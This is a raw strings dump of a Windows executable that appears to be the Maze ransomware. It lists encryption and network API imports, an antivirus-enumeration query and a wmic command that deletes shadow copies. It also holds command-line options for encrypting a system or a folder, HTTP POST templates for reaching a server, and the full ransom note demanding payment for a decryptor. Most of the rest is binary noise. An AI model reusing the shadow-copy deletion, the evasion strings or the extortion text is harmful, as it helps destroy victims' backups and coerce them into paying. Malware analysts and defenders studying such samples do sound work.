!This program cannot be run in DOS mode.
zPRich
`.rdata
@.data
D$@WVPh
NGGCCCC
user32.dll
DDDD^_[]
user32.dll
kernel32.dll
kernel32.dll
DDDDWh
kernel32.dll
DDDD^_[]
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
DDDDDDDDVh
kernel32.dll
PUhN+@
1Ph7,@
kernel32.dll
FFFFVj
$GFTOAAAAj
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
@@@@@UPh_
kernel32.dll
kernel32.dll
@Phe6@
kernel32.dll
Uj Phq;@
\$(j@h
D$ PSh9=@
DDDDDDDD
SWh`?@
7Ph`A@
kernel32.dll
WPh;B@
user32.dll
kernel32.dll
kernel32.dll
user32.dll
DDDDVh
user32.dll
kernel32.dll
DDDD^_[]
user32.dll
$GFTOAAAAj
kernel32.dll
kernel32.dll
user32.dll
t$$hlP@
SPh R@
D$0PVh
kernel32.dll
DDDDSh
DDDDVhU
kernel32.dll
t$ hZT@
kernel32.dll
^_[]DDDD
DDDDDDDD
WUhpZ@
kernel32.dll
DDDDDDDD
CCCCCCCCShs[@
VUh>]@
DDDDDDDD
jShR_@
SUht`@
user32.dll
4$h+b@
KKKKKKKKSh
DDDDDDDDSVUWhoc@
L$ WPQW
G j PV
3<$3l$
+q +Q$f
+q +Q$f
D$4VUP
D$\WVP
t$<VWU
l$(SWU
l$(SWU
t$`)D$
\$,+L$l
T$,)L$
|$X+\$h
DDDD^_[]
#D$<3D$@
3T$H#D$,#T$81
\$ #L$$#\$
#t$(#L$01
\$D#D$
D$H#L$D
D$(#L$
t$$#D$@1
D$8#L$<
D$$#L$H
D$@3T$
#L$,#t$(
L$(#L$8
D$4FFFFFFFF
D$Hy!~
DDDDDDDD
D$pWPh (A
DDDDDDDD
DDDDj VSh
|$0WSh
DDDDDDDDWhG)A
D$tPWSh~)A
DDDDDDDD
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
WBBBBBBBB9
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
QPhN@A
$jhB7D
4^DDDD
4^DDDD
kernel32.dll
DDDDf.
kernel32.dll
 ^_[]DDDD
ole32.dll
ole32.dll
ole32.dll
ole32.dll
t$(h KA
t$(h,8D
user32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
kernel32.dll
t$HVh|8D
user32.dll
L$LjhB7D
L$DQh_TA
D$xctio
D$tdire
D$pFsRe
D$low64
D$hertW
D$d4Rev
D$`Wow6
^_[]DDDD
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
0=FUhGbA
user32.dll
DDDD@Ph
@PVh:eA
DDDDDDDDSh
DDDD@Ph
kernel32.dll
7^_[]DDDD
DDDD^DDDD
^_[]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
DDDD^_[DDDD
^_[]DDDD
$Ph#kA
DDDD@@Ph
DDDDDDDD
DDDD^_DDDD
DDDD^_DDDD
FFFFFFF
DDDD@Ph\mA
user32.dll
DDDDDDDDVh
DDDD@Ph@nA
kernel32.dll
D$@PSj
D$@PVj
^_[]DDDD
DDDD@@Ph
DDDDDDDDUh
kernel32.dll
kernel32.dll
kernel32.dll
D$@jnh/9D
kernel32.dll
\$@jGh
|$ Wh*
user32.dll
kernel32.dll
kernel32.dll
user32.dll
DDDDDDDD
D<;VPh
DDDDDDDD9
D$8th: 
D$4Leng
D$0ent-
D$,ContS
DDDDDDDD1
kernel32.dll
kernel32.dll
t$ WhE
kernel32.dll
DDDDVh
^_[]DDDD
kernel32.dll
kernel32.dll
DDDDDDDD^_[]DDDD
kernel32.dll
user32.dll
\$DjLh
user32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
D$h2123
D$d6543
D$`9887
D$\4678
D$X6525
D$T7897
D$P2154
D$L3743
D$D3245
D$@0987
DDDDhf;D
DDDDDDDD
kernel32.dll
DDDDDDDD
kernel32.dll
DDDDDDDD
kernel32.dll
^_[]DDDD
^_[]DDDD
 ]DDDD
4]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
DDDDDDDD]DDDD
kernel32.dll
 ]DDDD
8^_]DDDD
4]DDDD
@@@@@@@@
4]DDDD
`AAAAAAAA
kernel32.dll
4^_]DDDD
kernel32.dll
0]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
T^]DDDD
0]DDDD
DDDDDDDD
GGGGWRQh
DDDDDDDD
DDDDDDDD
L$ VQPh
L$ VQPh
)D$ SR
AAAA;H
AAAAAAAA;H
AAAA;H
AAAAAAAA;H
w{AAAARQPh
$AAAAAAA
DDDD^_[]
AAAAAAA
$AAAAAAA
DDDD^_[]
HHHHHHHH
DDDDDDDD^_[]
$AAAAAAA
AAAAAAA
DDDD^_[]
DDDDDDDD
L$,;L$(
AAAAAAA
DDDDDDDD
D$$Ph(
HHHHHHHH
$AAAAAAA
$AAAAAAA
$AAAAAAA
$AAAAAAA
AAAAAAA
DDDD^_
DDDD^_
IIIIIIII
AAAAAAA
AAAAAAA
AAAAAAA
IIIIIIII
AAAAAAA
DDDD^_[]
$AAAAAAA
DDDD^_[]
$AAAAAAA
AAAAAAA
DDDD^_[]
$0<0u 
DDDD^_[]
tAfO@f!
fIfBf%Q
fNfOfAfF 
kernel32.dll
kernel32.dll
kernel32.dll
^_[DDDD
^_[DDDD
^_[DDDD
^[DDDD
^[DDDD
^[DDDD
DDDD^DDDD
^_DDDD
^_DDDD
j(hfAB
T^_DDDD
j(h>DB
^_]DDDD
UVhuOB
u}h5QB
r4SVhKRB
DDDDDDDD
DDDDDDDD
4$h|TB
4$hxUB
WVhkYB
SUh_ZB
SUh=\B
^_[]DDDD
@@@@@@
^_[]DDDD
@@@@@@
@VhHbB
^_[]DDDD
DDDDWh
VWh>fB
uuh'kB
DDDDDDDD
PQhppB
^_[]DDDD
WVhuwB
t$ WhQxB
^_[]DDDD
xGGGGGGGG9
^_[]DDDD
^_DDDD
^_DDDD
DDDD^_[]DDDD
^_[DDDD
DDDDDDDD^_[]DDDD
$^_[]DDDD
$DDDD^DDDD
Wj Ph<
^]DDDD
^]DDDD
^]DDDD
^]DDDD
P j@Rh
DDDDSh
^_[]DDDD
Sj Ph<
P j@Rh
DDDD^_[]DDDD
@@@@@@@@
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
advapi32.dll
advapi32.dll
advapi32.dll
kernel32.dll
DDDDDDDD^_[DDDD
advapi32.dll
advapi32.dll
kernel32.dll
kernel32.dll
user32.dll
DDDDDDDD
DDDDDDDD
kernel32.dll
DDDDDDDD
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
kernel32.dll
advapi32.dll
advapi32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
user32.dll
user32.dll
DDDDDDDD
D^_[]DDDD
kernel32.dll
|$(Wh^
kernel32.dll
kernel32.dll
PQRVSh
kernel32.dll
RQUPhd
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
^_DDDD
USWVPhx
advapi32.dll
user32.dll
advapi32.dll
advapi32.dll
DDDD^_[]
^_DDDD
^_DDDD
A,DDDD
A(DDDD
w(^_DDDD
^_DDDD
kernel32.dll
kernel32.dll
kernel32.dll
DDDDSh
kernel32.dll
0^_DDDD
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
^_DDDD
^_[]DDDD
user32.dll
^_[]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
^_[DDDD
PWhn0C
DDDDDDDD
^_[DDDD
kernel32.dll
PVh-3C
DDDDDDDD
kernel32.dll
^_[DDDD
DDDD^DDDD
$Vh[5C
user32.dll
DDDD^DDDD
kernel32.dll
kernel32.dll
user32.dll
H^_DDDD
DDDDDDDD^DDDD
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
D$pPj@S
kernel32.dll
D$pPj@S
kernel32.dll
D$pPj@
kernel32.dll
kernel32.dll
ole32.dll
ole32.dll
ole32.dll
kernel32.dll
FFFFFFFF
WPh=OC
ole32.dll
kernel32.dll
kernel32.dll
t$,h:TC
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
USWVPj
kernel32.dll
kernel32.dll
kernel32.dll
DDDD^_[]DDDD
WUSVhseC
DDDDDDDD^_[]
user32.dll
gdi32.dll
kernel32.dll
gdi32.dll
gdi32.dll
gdi32.dll
kernel32.dll
gdi32.dll
D$ PUh
gdi32.dll
gdi32.dll
gdi32.dll
gdi32.dll
|$4PQUh
user32.dll
kernel32.dll
user32.dll
user32.dll
kernel32.dll
gdi32.dll
(Pj@hj
gdi32.dll
kernel32.dll
kernel32.dll
QPSUh)
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
l$ PWh
gdi32.dll
gdi32.dll
gdi32.dll
^_[]DDDD
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_DDDD
USWVPh
t$ Ph3
user32.dll
t$ PhH
kernel32.dll
user32.dll
kernel32.dll
D$D394
D$@4628
user32.dll
^_DDDD
^[DDDD
kernel32.dll
kernel32.dll
user32.dll
^_DDDD
kernel32.dll
kernel32.dll
83729304958372930dhejskrlt9483s
.action
.phtml
.shtml
register
logout
content
private
messages
account
webauth
webaccess
archive
signin
signout
update
support
ticket
tracker
analytics
checkout
payout
withdrawal
create
transfer
http://%s%s
ntdll.dll
NtQueryEaFile
GFTOAV
NtSetEaFile
D7q/;M
Wow64RevertWow64FsRedirection
Wow64DisableWow64FsRedirection
realloc
msvcrt.dll
malloc
GET /%s HTTP/1.1
User-Agent: %s
Host: %s
Connection: Keep-Alive
POST /%s HTTP/1.1
User-Agent: %s
Host: %s
Content-Type: %s
Content-Length: %d
Connection: Keep-Alive
Content-Length: 
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
application/x-www-form-urlencoded
37432154789765254678988765432123
09873245
Error: incorrect --path parameter syntax
Syntax:
--path "C:\path\example\super database\"
Exiting...
expand 32-byte kexpand 16-byte k
CloseWindow
AnimateWindow
DestroyWindow
DeferWindowPos
MessageBoxW
wsprintfA
wsprintfW
EnumChildWindows
AdjustWindowRect
GetForegroundWindow
MessageBoxA
PostQuitMessage
ShutdownBlockReasonCreate
DefWindowProcA
ShutdownBlockReasonDestroy
RegisterClassExW
CreateWindowExW
GetMessageA
TranslateMessage
DispatchMessageA
ReleaseDC
USER32.dll
SelectPalette
SetPaletteEntries
GetDeviceCaps
SetPixel
DeleteObject
GDI32.dll
lstrlenA
GetModuleHandleA
LoadLibraryA
lstrcpyA
lstrcatA
VirtualFree
GetProcAddress
WaitForSingleObject
lstrlenW
CreateDirectoryW
GetLastError
TlsGetValue
TlsSetValue
CreateFileW
WriteFile
lstrcpynW
lstrcatW
FindNextFileW
lstrcmpW
CloseHandle
FindClose
GetTickCount
ExitThread
CreateThread
LocalAlloc
OutputDebugStringW
ExitProcess
HeapAlloc
VirtualAlloc
CreateToolhelp32Snapshot
Process32FirstW
Process32NextW
GetModuleHandleW
GetSystemDirectoryW
CreateProcessW
GetShortPathNameW
ExpandEnvironmentStringsW
GetVersionExA
GetCurrentProcessId
VirtualQuery
VirtualProtect
IsBadReadPtr
FreeLibrary
lstrcmpA
AllocConsole
GetStdHandle
WriteConsoleW
UnmapViewOfFile
lstrcmpiW
lstrcpyW
SetFileAttributesW
MoveFileExW
FindFirstFileW
WaitForMultipleObjects
GetDriveTypeW
GetTickCount64
SetThreadExecutionState
GetCommandLineW
CreateMutexW
GetFileSizeEx
SetFilePointerEx
ReadFile
CreateFileMappingW
MapViewOfFile
GetCurrentProcess
LocalFree
GetUserDefaultUILanguage
InitializeCriticalSection
DeleteCriticalSection
SetLastError
EnterCriticalSection
LeaveCriticalSection
TerminateThread
GlobalAlloc
GlobalFree
KERNEL32.dll
LsaCreateTrustedDomainEx
LookupAccountSidW
EncryptionDisable
LsaAddAccountRights
LsaQueryTrustedDomainInfo
AreAllAccessesGranted
EqualDomainSid
CryptGenRandom
LsaClose
LsaFreeMemory
CryptAcquireContextW
CryptGenKey
CryptExportKey
CryptDestroyKey
CryptReleaseContext
GetSidSubAuthorityCount
GetSidSubAuthority
CryptImportKey
CryptEncrypt
CryptDecrypt
ADVAPI32.dll
SHGetFolderPathW
ShellExecuteExW
SHELL32.dll
LsaConnectUntrusted
Secur32.dll
DsRoleGetPrimaryDomainInformation
DsRoleFreeMemory
NETAPI32.dll
StrStrW
StrToIntA
SHLWAPI.dll
WNetOpenEnumW
WNetEnumResourceW
WNetAddConnection2W
WNetCloseEnum
MPR.dll
inet_pton
WS2_32.dll
InternetOpenA
InternetCrackUrlA
InternetConnectA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
InternetCloseHandle
InternetReadFile
WININET.dll
CryptBinaryToStringW
CryptStringToBinaryA
CryptBinaryToStringA
CRYPT32.dll
CoUninitialize
CoInitializeEx
CoCreateInstance
ole32.dll
OLEAUT32.dll
IsProcessorFeaturePresent
e?#\Tn
Q4Rn>n
Y.LO3oYz
0x^#.hL
>*6$S<
%/ZU7~
I0'^a,
pf!qE^
d)z$vCq U
6^bE_2Cri<3$
X?Oo#
]5b"hs
lQN[,fzPm
q5roEra
;bh6b_
e?#\Tn
TW8Y~e?
r>0d1J
DfIB'h6B
@,tLW1
>isT2"
)?tG_`tz ,
nF=~Z:
0-L*V~T
6}mz>z_
lrU*Ce
V%9t{7}
`%-}vY
hh)o%(Q`
iYe#XMNhC
*iY}iX
XWK{a<
QD|=EU
#@uI3~E
Y^9p.:
"_8^uaW
C&C>@t.X
+=]MmXvp
,oN=N@4
~[Djw3
ww;_a
nF=~Z:
aZ4Oz%
GHw,!S
ppO+#L
S+aJ}m>
_2Oj]A
?l1t=;*S
>.bgJmE
+c.xcXK@D
-I=wZXz
KYCU;V
Fz&&wd
%GD@GD
oc1BLhX
2aWYDs7
o~E<\
oNK_HT
(OnT)il
([8EB&
,hSy3I
C:v@d=B
'TGt(v
Rm>;b<
2zYYl$
AA]Yc@DI%
y=:"i,O
hpZpS/
3DhEF)
`U!s'x
m><CZr
"i)R~I$
k&{Rt@R.
gq'~Io
SAD.`}
@$9>uu
%\>qwS
^Y!A{Q2
qX+<13OgK
qj2tnG
G$1Y_p!e
DSZGhq
/pOZog2
`]Vh4}f
q<uj;z
jD:*!u
cA7AO9]B'4
pxVDAc
UEhQt:_
J0fV23 0
{*.k-|
jGl@ur
4zHDbj:
)i_%S)
Ed{o*i
JzBdSx
=yxK{8
)&3'N@y
U=M7?LsZ
x=;P+{
/v:_xR
dIIJ<bK
%e%%e^
iVbV^Pp
fm=P6Ds
#HHx
j`@99bIQ
FKEapO
ej]WUg
lF2"Or
azyBRo
a:Z2-T
&6D+hux
O~OyJ5
hCAC@o
N@C~\F
lZKtk&
:i~z>,
 Sbf6O&
G'{4i:
\ZP753
T*Se4x
 WC\%ny
W#~ `l0;P@
rQ-jI5
$3HMP\rs
GcB<8ur
`_dd(Ke
jjjjjj
jjjjjj
jjjjjjj
@{0AFACED1-E828-11D1-9187-B532F1E9575D}
%s\%s.%s
target
%s%s%s%s
CLASSIFIED
SECRET
@\memes.tmp
eMicrosoft Enhanced Cryptographic Provider v1.0
%USERID%
%base64key%
nkernel32
__ProviderArchitecture
ROOT\cimv2
select * from Win32_ShadowCopy
Win32_ShadowCopy.id='%s'
Win32_ShadowCopy.ID='%s'
\wbem\wmic.exe
"%s" shadowcopy delete
A%windir%\system32\wbem\wmic
process call create "cmd /c start %s"
:\Windows
\Games\
\Tor Browser\
\ProgramData\
\cache2\entries\
\Low\Content.IE5\
\User Data\Default\Cache\
\All Users
\IETldCache\
\Local Settings\
\AppData\Local
AhnLab
Enc: %s
qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890
\Program Files
Encrypting whole system
Encrypting specified folder in --path parameter...
!Finished in %d ms!
B--logging
--nomutex
--noshares
--path
.Logging enabled | Maze
NO SHARES | 
NO MUTEX | 
Encrypting: 
%s.tmp
Global\%s
DECRYPT-FILES.txt
autorun.inf
boot.ini
desktop.ini
ntuser.dat
iconcache.db
bootsect.bak
ntuser.dat.log
thumbs.db
Bootfont.bin
overflow|
overflow
root\SecurityCenter2
Select * From AntiVirusProduct
displayName
|deprecated > v2.3|
%c_%c_%d/%d|
1234567890
Cqwertyuiopasdfghjklzxcvbnm1234567890                        
%shiberfil.sys
%spagefile.sys
%sswapfile.sys
CMaze Ransomware
Dear %s, your files have been encrypted by RSA-2048 and ChaCha algorithms
The only way to restore them is to buy decryptor
These algorithms are one of the strongest
You can read about them at wikipedia
If you understand the importance of situation you can restore all files by following instructions in DECRYPT-FILES.txt file
You can decrypt 3 files for free as a proof of work
We know that this computer is 
a standalone server
a server in corporate network
a workstation in corporate network
a primary domain controller
a backup server
very valuable for you
So we will give you appropriate price for recovering
\111.bmp
You need to buy decryptor in order to restore the files.
%s! Alert! %s! Alert! Dear %s Your files have been encrypted by %s! Attention! %s
